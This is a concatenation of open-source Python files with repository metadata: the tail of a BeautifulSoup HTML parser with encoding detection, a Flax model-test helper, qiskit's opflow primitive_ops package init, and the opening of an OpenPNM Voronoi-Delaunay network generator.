        _smartPop, then push a new Tag onto the stack (popping it again
        immediately if the tag is self-closing)."""
        #print "Start tag %s: %s" % (name, attrs)
        if self.quoteStack:
            #This is not a real tag: we're inside a quoted region
            #(e.g. <script>), so render the tag back out as text.
            #print "<%s> is not real!" % name
            attrs = ''.join(map(lambda(x, y): ' %s="%s"' % (x, y), attrs))
            self.handle_data('<%s%s>' % (name, attrs))
            return
        self.endData()

        if not self.isSelfClosingTag(name) and not selfClosing:
            self._smartPop(name)

        # When parsing only part of the document (parseOnlyThese set),
        # skip top-level tags that don't match the filter.
        if self.parseOnlyThese and len(self.tagStack) <= 1 \
               and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)):
            return

        tag = Tag(self, name, attrs, self.currentTag, self.previous)
        if self.previous:
            self.previous.next = tag
        self.previous = tag
        self.pushTag(tag)
        if selfClosing or self.isSelfClosingTag(name):
            self.popTag()
        if name in self.QUOTE_TAGS:
            #print "Beginning quote (%s)" % name
            # Everything until the matching end tag is literal text.
            self.quoteStack.append(name)
            self.literal = 1
        return tag
    def unknown_endtag(self, name):
        """Handle a closing tag: flush pending text, pop the stack up
        to the matching open tag, and leave quoted-literal mode if this
        closes the currently quoted tag."""
        #print "End tag %s" % name
        if self.quoteStack and self.quoteStack[-1] != name:
            #This is not a real end tag: inside a quoted region only
            #the quote tag's own end tag is treated as markup.
            #print "</%s> is not real!" % name
            self.handle_data('</%s>' % name)
            return
        self.endData()
        self._popToTag(name)
        if self.quoteStack and self.quoteStack[-1] == name:
            self.quoteStack.pop()
            # Stay literal only if there are still enclosing quotes.
            self.literal = (len(self.quoteStack) > 0)
    def handle_data(self, data):
        """Accumulate a chunk of character data in the current buffer."""
        self.currentData.append(data)
    def extractCharsetFromMeta(self, attrs):
        """Base-class hook for <meta> tags: treat them like any other
        start tag. BeautifulSoup overrides this to sniff the charset."""
        self.unknown_starttag('meta', attrs)
class BeautifulSoup(BeautifulStoneSoup):
    """This parser knows the following facts about HTML:

    * Some tags have no closing tag and should be interpreted as being
      closed as soon as they are encountered.

    * The text inside some tags (ie. 'script') may contain tags which
      are not really part of the document and which should be parsed
      as text, not tags. If you want to parse the text as tags, you can
      always fetch it and parse it explicitly.

    * Tag nesting rules:

      Most tags can't be nested at all. For instance, the occurrence of
      a <p> tag should implicitly close the previous <p> tag.

       <p>Para1<p>Para2
        should be transformed into:
       <p>Para1</p><p>Para2

      Some tags can be nested arbitrarily. For instance, the occurrence
      of a <blockquote> tag should _not_ implicitly close the previous
      <blockquote> tag.

       Alice said: <blockquote>Bob said: <blockquote>Blah
        should NOT be transformed into:
       Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah

      Some tags can be nested, but the nesting is reset by the
      interposition of other tags. For instance, a <tr> tag should
      implicitly close the previous <tr> tag within the same <table>,
      but not close a <tr> tag in another table.

       <table><tr>Blah<tr>Blah
        should be transformed into:
       <table><tr>Blah</tr><tr>Blah
       but,
       <tr>Blah<table><tr>Blah
        should NOT be transformed into
       <tr>Blah<table></tr><tr>Blah

    Differing assumptions about tag nesting rules are a major source
    of problems with the BeautifulSoup class. If BeautifulSoup is not
    treating as nestable a tag your page author treats as nestable,
    try ICantBelieveItsBeautifulSoup, MinimalSoup, or
    BeautifulStoneSoup before writing your own subclass."""

    def __init__(self, *args, **kwargs):
        # Default to converting MS smart quotes to HTML entities, and
        # flag the input as HTML so <meta> charset sniffing happens.
        if not kwargs.has_key('smartQuotesTo'):
            kwargs['smartQuotesTo'] = self.HTML_ENTITIES
        kwargs['isHTML'] = True
        BeautifulStoneSoup.__init__(self, *args, **kwargs)

    # Tags with no closing tag; they are closed as soon as opened.
    SELF_CLOSING_TAGS = buildTagMap(None,
                                    ['br' , 'hr', 'input', 'img', 'meta',
                                     'spacer', 'link', 'frame', 'base'])

    # Whitespace inside these tags is significant and must be kept.
    PRESERVE_WHITESPACE_TAGS = set(['pre', 'textarea'])

    # The contents of these tags are treated as literal text, not markup.
    QUOTE_TAGS = {'script' : None, 'textarea' : None}

    #According to the HTML standard, each of these inline tags can
    #contain another tag of the same type. Furthermore, it's common
    #to actually use these tags this way.
    NESTABLE_INLINE_TAGS = ['span', 'font', 'q', 'object', 'bdo', 'sub', 'sup',
                            'center']

    #According to the HTML standard, these block tags can contain
    #another tag of the same type. Furthermore, it's common
    #to actually use these tags this way.
    NESTABLE_BLOCK_TAGS = ['blockquote', 'div', 'fieldset', 'ins', 'del']

    #Lists can contain other lists, but there are restrictions.
    NESTABLE_LIST_TAGS = { 'ol' : [],
                           'ul' : [],
                           'li' : ['ul', 'ol'],
                           'dl' : [],
                           'dd' : ['dl'],
                           'dt' : ['dl'] }

    #Tables can contain other tables, but there are restrictions.
    NESTABLE_TABLE_TAGS = {'table' : [],
                           'tr' : ['table', 'tbody', 'tfoot', 'thead'],
                           'td' : ['tr'],
                           'th' : ['tr'],
                           'thead' : ['table'],
                           'tbody' : ['table'],
                           'tfoot' : ['table'],
                           }

    # A new tag of one of these types implicitly closes the previous one.
    NON_NESTABLE_BLOCK_TAGS = ['address', 'form', 'p', 'pre']

    #If one of these tags is encountered, all tags up to the next tag of
    #this type are popped.
    RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript',
                                     NON_NESTABLE_BLOCK_TAGS,
                                     NESTABLE_LIST_TAGS,
                                     NESTABLE_TABLE_TAGS)

    NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS,
                                NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS)

    # Used to detect the charset in a META tag; see extractCharsetFromMeta
    CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)", re.M)

    def extractCharsetFromMeta(self, attrs):
        """Beautiful Soup can detect a charset included in a META tag,
        try to convert the document to that charset, and re-parse the
        document from the beginning."""
        httpEquiv = None
        contentType = None
        contentTypeIndex = None
        tagNeedsEncodingSubstitution = False

        # Scan the attributes for http-equiv and content values.
        for i in range(0, len(attrs)):
            key, value = attrs[i]
            key = key.lower()
            if key == 'http-equiv':
                httpEquiv = value
            elif key == 'content':
                contentType = value
                contentTypeIndex = i

        if httpEquiv and contentType: # It's an interesting meta tag.
            match = self.CHARSET_RE.search(contentType)
            if match:
                if (self.declaredHTMLEncoding is not None or
                    self.originalEncoding == self.fromEncoding):
                    # An HTML encoding was sniffed while converting
                    # the document to Unicode, or an HTML encoding was
                    # sniffed during a previous pass through the
                    # document, or an encoding was specified
                    # explicitly and it worked. Rewrite the meta tag.
                    def rewrite(match):
                        return match.group(1) + "%SOUP-ENCODING%"
                    newAttr = self.CHARSET_RE.sub(rewrite, contentType)
                    attrs[contentTypeIndex] = (attrs[contentTypeIndex][0],
                                               newAttr)
                    tagNeedsEncodingSubstitution = True
                else:
                    # This is our first pass through the document.
                    # Go through it again with the encoding information.
                    newCharset = match.group(3)
                    if newCharset and newCharset != self.originalEncoding:
                        self.declaredHTMLEncoding = newCharset
                        self._feed(self.declaredHTMLEncoding)
                        raise StopParsing
                    pass
        tag = self.unknown_starttag("meta", attrs)
        if tag and tagNeedsEncodingSubstitution:
            tag.containsSubstitutions = True
class StopParsing(Exception):
    """Raised (e.g. by BeautifulSoup.extractCharsetFromMeta) to abort
    the current parse so the document can be re-parsed with a newly
    detected encoding."""
    pass
class ICantBelieveItsBeautifulSoup(BeautifulSoup):
    """The BeautifulSoup class is oriented towards skipping over
    common HTML errors like unclosed tags. However, sometimes it makes
    errors of its own. For instance, consider this fragment:

     <b>Foo<b>Bar</b></b>

    This is perfectly valid (if bizarre) HTML. However, the
    BeautifulSoup class will implicitly close the first b tag when it
    encounters the second 'b'. It will think the author wrote
    "<b>Foo<b>Bar", and didn't close the first 'b' tag, because
    there's no real-world reason to bold something that's already
    bold. When it encounters '</b></b>' it will close two more 'b'
    tags, for a grand total of three tags closed instead of two. This
    can throw off the rest of your document structure. The same is
    true of a number of other tags, listed below.

    It's much more common for someone to forget to close a 'b' tag
    than to actually use nested 'b' tags, and the BeautifulSoup class
    handles the common case. This class handles the not-so-common
    case: where you can't believe someone wrote what they did, but
    it's valid HTML and BeautifulSoup screwed up by assuming it
    wouldn't be."""

    # Inline tags this class additionally treats as nestable.
    # ('strong' and 'big' appear twice; duplicates are harmless when
    # the list is folded into the NESTABLE_TAGS map below.)
    I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \
     ['em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong',
      'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b',
      'big']

    I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ['noscript']

    NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS,
                                I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS,
                                I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS)
class MinimalSoup(BeautifulSoup):
    """The MinimalSoup class is for parsing HTML that contains
    pathologically bad markup. It makes no assumptions about tag
    nesting, but it does know which tags are self-closing, that
    <script> tags contain Javascript and should not be parsed, that
    META tags may contain encoding information, and so on.

    This also makes it better for subclassing than BeautifulStoneSoup
    or BeautifulSoup."""

    # Only <noscript> resets nesting, and no tags are considered
    # nestable at all.
    RESET_NESTING_TAGS = buildTagMap('noscript')
    NESTABLE_TAGS = {}
class BeautifulSOAP(BeautifulStoneSoup):
    """This class will push a tag with only a single string child into
    the tag's parent as an attribute. The attribute's name is the tag
    name, and the value is the string child. An example should give
    the flavor of the change:

    <foo><bar>baz</bar></foo>
     =>
    <foo bar="baz"><bar>baz</bar></foo>

    You can then access fooTag['bar'] instead of fooTag.barTag.string.

    This is, of course, useful for scraping structures that tend to
    use subelements instead of attributes, such as SOAP messages. Note
    that it modifies its input, so don't print the modified version
    out.

    I'm not sure how many people really want to use this class; let me
    know if you do. Mainly I like the name."""
    def popTag(self):
        # Before popping, mirror a single-string child tag onto its
        # parent as an attribute (unless the parent already has an
        # attribute with that name).
        if len(self.tagStack) > 1:
            tag = self.tagStack[-1]
            parent = self.tagStack[-2]
            parent._getAttrMap()
            if (isinstance(tag, Tag) and len(tag.contents) == 1 and
                isinstance(tag.contents[0], NavigableString) and
                not parent.attrMap.has_key(tag.name)):
                parent[tag.name] = tag.contents[0]
        BeautifulStoneSoup.popTag(self)
#Enterprise class names! It has come to our attention that some people
#think the names of the Beautiful Soup parser classes are too silly
#and "unprofessional" for use in enterprise screen-scraping. We feel
#your pain! For such-minded folk, the Beautiful Soup Consortium And
#All-Night Kosher Bakery recommends renaming this file to
#"RobustParser.py" (or, in cases of extreme enterprisiness,
#"RobustParserBeanInterface.class") and using the following
#enterprise-friendly class aliases:
class RobustXMLParser(BeautifulStoneSoup):
    """Enterprise-friendly alias for BeautifulStoneSoup."""
    pass
class RobustHTMLParser(BeautifulSoup):
    """Enterprise-friendly alias for BeautifulSoup."""
    pass
class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup):
    """Enterprise-friendly alias for ICantBelieveItsBeautifulSoup."""
    pass
class RobustInsanelyWackAssHTMLParser(MinimalSoup):
    """Enterprise-friendly alias for MinimalSoup."""
    pass
class SimplifyingSOAPParser(BeautifulSOAP):
    """Enterprise-friendly alias for BeautifulSOAP."""
    pass
######################################################
#
# Bonus library: Unicode, Dammit
#
# This class forces XML data into a standard format (usually to UTF-8
# or Unicode). It is heavily based on code from Mark Pilgrim's
# Universal Feed Parser. It does not rewrite the XML or HTML to
# reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi
# (XML) and BeautifulSoup.start_meta (HTML).
# Autodetects character encodings.
# Download from http://chardet.feedparser.org/
try:
import chardet
# import chardet.constants
# chardet.constants._debug = 1
except ImportError:
chardet = None
# cjkcodecs and iconv_codec make Python know about more character encodings.
# Both are available from http://cjkpython.i18n.org/
# They're built in if you use Python 2.4.
try:
import cjkcodecs.aliases
except ImportError:
pass
try:
import iconv_codec
except ImportError:
pass
class UnicodeDammit:
    """A class for detecting the encoding of a *ML document and
    converting it to a Unicode string. If the source encoding is
    windows-1252, can replace MS smart quotes with their HTML or XML
    equivalents."""

    # This dictionary maps commonly seen values for "charset" in HTML
    # meta tags to the corresponding Python codec names. It only covers
    # values that aren't in Python's aliases and can't be determined
    # by the heuristics in find_codec.
    CHARSET_ALIASES = { "macintosh" : "mac-roman",
                        "x-sjis" : "shift-jis" }

    def __init__(self, markup, overrideEncodings=[],
                 smartQuotesTo='xml', isHTML=False):
        """Convert `markup` to Unicode: try `overrideEncodings` first,
        then the declared/sniffed encodings, then chardet (if
        available), then utf-8 and windows-1252 as a last resort.

        NOTE(review): `overrideEncodings=[]` is a shared mutable
        default; it is only iterated here, so it is safe in practice.
        """
        self.declaredHTMLEncoding = None
        self.markup, documentEncoding, sniffedEncoding = \
                     self._detectEncoding(markup, isHTML)
        self.smartQuotesTo = smartQuotesTo
        self.triedEncodings = []
        if markup == '' or isinstance(markup, unicode):
            # Already Unicode (or empty): nothing to convert.
            self.originalEncoding = None
            self.unicode = unicode(markup)
            return

        u = None
        for proposedEncoding in overrideEncodings:
            u = self._convertFrom(proposedEncoding)
            if u: break
        if not u:
            for proposedEncoding in (documentEncoding, sniffedEncoding):
                u = self._convertFrom(proposedEncoding)
                if u: break

        # If no luck and we have auto-detection library, try that:
        if not u and chardet and not isinstance(self.markup, unicode):
            u = self._convertFrom(chardet.detect(self.markup)['encoding'])

        # As a last resort, try utf-8 and windows-1252:
        if not u:
            for proposed_encoding in ("utf-8", "windows-1252"):
                u = self._convertFrom(proposed_encoding)
                if u: break

        # self.unicode is None if every attempt failed.
        self.unicode = u
        if not u: self.originalEncoding = None

    def _subMSChar(self, match):
        """Changes a MS smart quote character to an XML or HTML
        entity."""
        orig = match.group(1)
        sub = self.MS_CHARS.get(orig)
        # Tuple entries are (entity-name, hex-codepoint); plain string
        # entries (e.g. '?') are substituted as-is.
        if type(sub) == types.TupleType:
            if self.smartQuotesTo == 'xml':
                sub = '&#x'.encode() + sub[1].encode() + ';'.encode()
            else:
                sub = '&'.encode() + sub[0].encode() + ';'.encode()
        else:
            sub = sub.encode()
        return sub

    def _convertFrom(self, proposed):
        """Try to decode the markup from the `proposed` encoding.
        Returns the converted markup on success, or None on failure
        (or if the encoding was already tried)."""
        proposed = self.find_codec(proposed)
        if not proposed or proposed in self.triedEncodings:
            return None
        self.triedEncodings.append(proposed)
        markup = self.markup

        # Convert smart quotes to HTML if coming from an encoding
        # that might have them.
        if self.smartQuotesTo and proposed.lower() in("windows-1252",
                                                      "iso-8859-1",
                                                      "iso-8859-2"):
            smart_quotes_re = "([\x80-\x9f])"
            smart_quotes_compiled = re.compile(smart_quotes_re)
            markup = smart_quotes_compiled.sub(self._subMSChar, markup)

        try:
            # print "Trying to convert document to %s" % proposed
            u = self._toUnicode(markup, proposed)
            self.markup = u
            self.originalEncoding = proposed
        except Exception, e:
            # print "That didn't work!"
            # print e
            return None
        #print "Correct encoding: %s" % proposed
        return self.markup

    def _toUnicode(self, data, encoding):
        '''Given a string and its encoding, decodes the string into Unicode.
        %encoding is a string recognized by encodings.aliases'''

        # strip Byte Order Mark (if present); a BOM overrides the
        # caller-supplied encoding.
        if (len(data) >= 4) and (data[:2] == '\xfe\xff') \
               and (data[2:4] != '\x00\x00'):
            encoding = 'utf-16be'
            data = data[2:]
        elif (len(data) >= 4) and (data[:2] == '\xff\xfe') \
                 and (data[2:4] != '\x00\x00'):
            encoding = 'utf-16le'
            data = data[2:]
        elif data[:3] == '\xef\xbb\xbf':
            encoding = 'utf-8'
            data = data[3:]
        elif data[:4] == '\x00\x00\xfe\xff':
            encoding = 'utf-32be'
            data = data[4:]
        elif data[:4] == '\xff\xfe\x00\x00':
            encoding = 'utf-32le'
            data = data[4:]
        newdata = unicode(data, encoding)
        return newdata

    def _detectEncoding(self, xml_data, isHTML=False):
        """Given a document, tries to detect its XML encoding."""
        xml_encoding = sniffed_xml_encoding = None
        try:
            # Sniff the leading bytes / BOM to guess the transport
            # encoding, transcoding recognized multi-byte data to utf-8.
            if xml_data[:4] == '\x4c\x6f\xa7\x94':
                # EBCDIC
                xml_data = self._ebcdic_to_ascii(xml_data)
            elif xml_data[:4] == '\x00\x3c\x00\x3f':
                # UTF-16BE
                sniffed_xml_encoding = 'utf-16be'
                xml_data = unicode(xml_data, 'utf-16be').encode('utf-8')
            elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \
                     and (xml_data[2:4] != '\x00\x00'):
                # UTF-16BE with BOM
                sniffed_xml_encoding = 'utf-16be'
                xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8')
            elif xml_data[:4] == '\x3c\x00\x3f\x00':
                # UTF-16LE
                sniffed_xml_encoding = 'utf-16le'
                xml_data = unicode(xml_data, 'utf-16le').encode('utf-8')
            elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \
                     (xml_data[2:4] != '\x00\x00'):
                # UTF-16LE with BOM
                sniffed_xml_encoding = 'utf-16le'
                xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8')
            elif xml_data[:4] == '\x00\x00\x00\x3c':
                # UTF-32BE
                sniffed_xml_encoding = 'utf-32be'
                xml_data = unicode(xml_data, 'utf-32be').encode('utf-8')
            elif xml_data[:4] == '\x3c\x00\x00\x00':
                # UTF-32LE
                sniffed_xml_encoding = 'utf-32le'
                xml_data = unicode(xml_data, 'utf-32le').encode('utf-8')
            elif xml_data[:4] == '\x00\x00\xfe\xff':
                # UTF-32BE with BOM
                sniffed_xml_encoding = 'utf-32be'
                xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8')
            elif xml_data[:4] == '\xff\xfe\x00\x00':
                # UTF-32LE with BOM
                sniffed_xml_encoding = 'utf-32le'
                xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8')
            elif xml_data[:3] == '\xef\xbb\xbf':
                # UTF-8 with BOM
                sniffed_xml_encoding = 'utf-8'
                xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8')
            else:
                sniffed_xml_encoding = 'ascii'
                pass
        except:
            # NOTE(review): bare except -- any sniffing error falls
            # through silently with whatever was detected so far.
            xml_encoding_match = None
        # Look for an explicit declaration: an <?xml ... encoding=...?>
        # prolog or, for HTML, a <meta ... charset=...> tag.
        xml_encoding_re = '^<\?.*encoding=[\'"](.*?)[\'"].*\?>'.encode()
        xml_encoding_match = re.compile(xml_encoding_re).match(xml_data)
        if not xml_encoding_match and isHTML:
            meta_re = '<\s*meta[^>]+charset=([^>]*?)[;\'">]'.encode()
            regexp = re.compile(meta_re, re.I)
            xml_encoding_match = regexp.search(xml_data)
        if xml_encoding_match is not None:
            xml_encoding = xml_encoding_match.groups()[0].decode(
                'ascii').lower()
            if isHTML:
                self.declaredHTMLEncoding = xml_encoding
            if sniffed_xml_encoding and \
               (xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode',
                                 'iso-10646-ucs-4', 'ucs-4', 'csucs4',
                                 'utf-16', 'utf-32', 'utf_16', 'utf_32',
                                 'utf16', 'u16')):
                # Prefer the sniffed encoding over these generic /
                # ambiguous declared names.
                xml_encoding = sniffed_xml_encoding
        return xml_data, xml_encoding, sniffed_xml_encoding

    def find_codec(self, charset):
        """Map `charset` to a usable Python codec name, trying the
        known aliases and hyphen-stripped/underscored variants; falls
        back to returning the input unchanged."""
        return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \
               or (charset and self._codec(charset.replace("-", ""))) \
               or (charset and self._codec(charset.replace("-", "_"))) \
               or charset

    def _codec(self, charset):
        """Return `charset` if Python has a codec for it, else None."""
        if not charset: return charset
        codec = None
        try:
            codecs.lookup(charset)
            codec = charset
        except (LookupError, ValueError):
            pass
        return codec

    # Lazily built translation table used by _ebcdic_to_ascii.
    EBCDIC_TO_ASCII_MAP = None
    def _ebcdic_to_ascii(self, s):
        """Translate an EBCDIC byte string to its ASCII equivalent."""
        c = self.__class__
        if not c.EBCDIC_TO_ASCII_MAP:
            emap = (0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15,
                    16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31,
                    128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7,
                    144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26,
                    32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33,
                    38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94,
                    45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63,
                    186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34,
                    195,97,98,99,100,101,102,103,104,105,196,197,198,199,200,
                    201,202,106,107,108,109,110,111,112,113,114,203,204,205,
                    206,207,208,209,126,115,116,117,118,119,120,121,122,210,
                    211,212,213,214,215,216,217,218,219,220,221,222,223,224,
                    225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72,
                    73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81,
                    82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89,
                    90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57,
                    250,251,252,253,254,255)
            import string
            c.EBCDIC_TO_ASCII_MAP = string.maketrans( \
            ''.join(map(chr, range(256))), ''.join(map(chr, emap)))
        return s.translate(c.EBCDIC_TO_ASCII_MAP)

    # Windows-1252 "smart" punctuation bytes mapped to an
    # (HTML entity name, hex codepoint) pair, or to a literal
    # replacement string where no entity applies.
    MS_CHARS = { '\x80' : ('euro', '20AC'),
                 '\x81' : ' ',
                 '\x82' : ('sbquo', '201A'),
                 '\x83' : ('fnof', '192'),
                 '\x84' : ('bdquo', '201E'),
                 '\x85' : ('hellip', '2026'),
                 '\x86' : ('dagger', '2020'),
                 '\x87' : ('Dagger', '2021'),
                 '\x88' : ('circ', '2C6'),
                 '\x89' : ('permil', '2030'),
                 '\x8A' : ('Scaron', '160'),
                 '\x8B' : ('lsaquo', '2039'),
                 '\x8C' : ('OElig', '152'),
                 '\x8D' : '?',
                 '\x8E' : ('#x17D', '17D'),
                 '\x8F' : '?',
                 '\x90' : '?',
                 '\x91' : ('lsquo', '2018'),
                 '\x92' : ('rsquo', '2019'),
                 '\x93' : ('ldquo', '201C'),
                 '\x94' : ('rdquo', '201D'),
                 '\x95' : ('bull', '2022'),
                 '\x96' : ('ndash', '2013'),
                 '\x97' : ('mdash', '2014'),
                 '\x98' : ('tilde', '2DC'),
                 '\x99' : ('trade', '2122'),
                 '\x9a' : ('scaron', '161'),
                 '\x9b' : ('rsaquo', '203A'),
                 '\x9c' : ('oelig', '153'),
                 '\x9d' : '?',
                 '\x9e' : ('#x17E', '17E'),
                 '\x9f' : ('Yuml', ''),}
#######################################################################


#By default, act as an HTML pretty-printer: read HTML from stdin,
#parse it, and print the re-indented tree.
if __name__ == '__main__':
    import sys
    soup = BeautifulSoup(sys.stdin)
    print soup.prettify()
| {
"content_hash": "ba72c426c9d266512e217ef1625238a7",
"timestamp": "",
"source": "github",
"line_count": 2000,
"max_line_length": 186,
"avg_line_length": 39.501,
"alnum_prop": 0.5737196526670211,
"repo_name": "sniemi/SamPy",
"id": "6a327212aa472628da8e5328adb3ac513c17e3c3",
"size": "79002",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "parsing/BeautifulSoup.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "296"
},
{
"name": "C",
"bytes": "68436"
},
{
"name": "C++",
"bytes": "45956"
},
{
"name": "CSS",
"bytes": "35570"
},
{
"name": "Fortran",
"bytes": "45191"
},
{
"name": "HTML",
"bytes": "107435"
},
{
"name": "IDL",
"bytes": "13651"
},
{
"name": "JavaScript",
"bytes": "25435"
},
{
"name": "Makefile",
"bytes": "26035"
},
{
"name": "Matlab",
"bytes": "1508"
},
{
"name": "Perl",
"bytes": "59198"
},
{
"name": "PostScript",
"bytes": "1403536"
},
{
"name": "Prolog",
"bytes": "16061"
},
{
"name": "Python",
"bytes": "5763358"
},
{
"name": "R",
"bytes": "208346"
},
{
"name": "Rebol",
"bytes": "161"
},
{
"name": "Roff",
"bytes": "73616"
},
{
"name": "Ruby",
"bytes": "2032"
},
{
"name": "Shell",
"bytes": "41512"
},
{
"name": "Tcl",
"bytes": "44150"
},
{
"name": "TeX",
"bytes": "107783"
}
],
"symlink_target": ""
} |
"""Utilities for model tests."""
from flax import linen as nn
from jax import random
import jax.numpy as jnp
def get_common_model_test_inputs():
  """Build the standard (rng, inputs, shared_args) fixture for model tests.

  Returns:
    A tuple of (PRNG key, int32 token batch of shape (4, 16), dict of
    shared model-constructor kwargs including a shared embedding layer).
  """
  key = random.PRNGKey(0)
  num_examples, length = 4, 16
  token_batch = jnp.ones((num_examples, length), dtype=jnp.int32)
  args = dict(
      vocab_size=20,
      emb_dim=10,
      qkv_dim=8,
      mlp_dim=16,
      num_heads=2,
      max_len=length,
      train=False,
  )
  # All models under test share a single embedding layer.
  args["shared_embedding"] = nn.Embed(
      num_embeddings=args["vocab_size"],
      features=args["emb_dim"],
      embedding_init=nn.initializers.normal(stddev=1.0))
  return key, token_batch, args
def get_small_model_test_inputs():
  """Build a minimal (rng, inputs, shared_args) fixture.

  Intended for slow model tests (e.g. ones that jit-compile), so every
  model dimension is kept as small as possible.
  """
  key = random.PRNGKey(0)
  length = 16
  token_batch = jnp.ones((1, length), dtype=jnp.int32)
  args = dict(
      vocab_size=2,
      emb_dim=2,
      qkv_dim=2,
      mlp_dim=2,
      num_heads=2,
      max_len=length,
      train=False,
  )
  # All models under test share a single embedding layer.
  args["shared_embedding"] = nn.Embed(
      num_embeddings=args["vocab_size"],
      features=args["emb_dim"],
      embedding_init=nn.initializers.normal(stddev=1.0))
  return key, token_batch, args
| {
"content_hash": "6df8876cb153f0852e8902fa9f09172d",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 59,
"avg_line_length": 26.923076923076923,
"alnum_prop": 0.6192857142857143,
"repo_name": "google-research/pegasus",
"id": "c7aa39d33b8933762d33247d26860ea7037c60b9",
"size": "1986",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "pegasus/flax/models/encoders/test_utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "112333"
},
{
"name": "HTML",
"bytes": "1952"
},
{
"name": "Python",
"bytes": "673550"
}
],
"symlink_target": ""
} |
"""
Primitive Operators (:mod:`qiskit.opflow.primitive_ops`)
========================================================
.. currentmodule:: qiskit.opflow.primitive_ops
Operators are defined to be functions which take State functions to State functions.
PrimitiveOps are the classes for representing basic Operators, backed by computational
Operator primitives from Terra. These classes (and inheritors) primarily serve to allow the
underlying primitives to "flow" - i.e. interoperability and adherence to the Operator
formalism - while the core computational logic mostly remains in the underlying primitives.
For example, we would not produce an interface in Terra in which
``QuantumCircuit1 + QuantumCircuit2`` equaled the Operator sum of the circuit
unitaries, rather than simply appending the circuits. However, within the Operator
flow summing the unitaries is the expected behavior.
Note:
All mathematical methods are not in-place, meaning that they return a
new object, but the underlying primitives are not copied.
Primitive Operators
-------------------
.. autosummary::
:toctree: ../stubs/
:template: autosummary/class_no_inherited_members.rst
PrimitiveOp
CircuitOp
MatrixOp
PauliOp
PauliSumOp
TaperedPauliSumOp
Symmetries
----------
.. autosummary::
:toctree: ../stubs/
:template: autosummary/class_no_inherited_members.rst
Z2Symmetries
"""
from .primitive_op import PrimitiveOp
from .pauli_op import PauliOp
from .matrix_op import MatrixOp
from .circuit_op import CircuitOp
from .pauli_sum_op import PauliSumOp
from .tapered_pauli_sum_op import TaperedPauliSumOp, Z2Symmetries
# Names exported by ``from qiskit.opflow.primitive_ops import *``.
__all__ = [
    "PrimitiveOp",
    "PauliOp",
    "MatrixOp",
    "CircuitOp",
    "PauliSumOp",
    "TaperedPauliSumOp",
    "Z2Symmetries",
]
| {
"content_hash": "958dfb3a5d9e4764b910e4bb7b1803a7",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 91,
"avg_line_length": 29.262295081967213,
"alnum_prop": 0.726610644257703,
"repo_name": "QISKit/qiskit-sdk-py",
"id": "1af6558935993023bcf8ef93f694ff2624dc97f7",
"size": "2263",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "qiskit/opflow/primitive_ops/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "2582"
},
{
"name": "C++",
"bytes": "327518"
},
{
"name": "CMake",
"bytes": "19294"
},
{
"name": "Makefile",
"bytes": "5608"
},
{
"name": "Pascal",
"bytes": "2444"
},
{
"name": "Python",
"bytes": "1312801"
},
{
"name": "Shell",
"bytes": "8385"
}
],
"symlink_target": ""
} |
import scipy.spatial as sptl
import scipy.sparse as sprs
import numpy as np
from openpnm._skgraph.generators import tools
from openpnm._skgraph.operations import trim_nodes
from openpnm._skgraph.tools import isoutside, conns_to_am
from openpnm._skgraph.queries import find_neighbor_nodes
def voronoi_delaunay_dual(points, shape, trim=True, reflect=True,
                          node_prefix='node', edge_prefix='edge'):
    r"""
    Generate a dual Voronoi-Delaunay network from given base points

    Parameters
    ----------
    points : array_like or scalar
        The points to be tessellated.  If a scalar is given a set of points
        of that size is generated inside the given ``shape``.
    shape : array_like
        The size of the domain in which the points lie
    trim : bool, optional
        If ``True`` (default) then all points lying beyond the given domain
        shape will be removed
    reflect : bool, optional
        If ``True`` (default) the base points are reflected across the
        domain boundaries before tessellation (see ``tools.parse_points``)
    node_prefix : str, optional
        Prefix used for node arrays in the returned dictionary
        (default ``'node'``)
    edge_prefix : str, optional
        Prefix used for edge arrays in the returned dictionary
        (default ``'edge'``)

    Returns
    -------
    network : dict
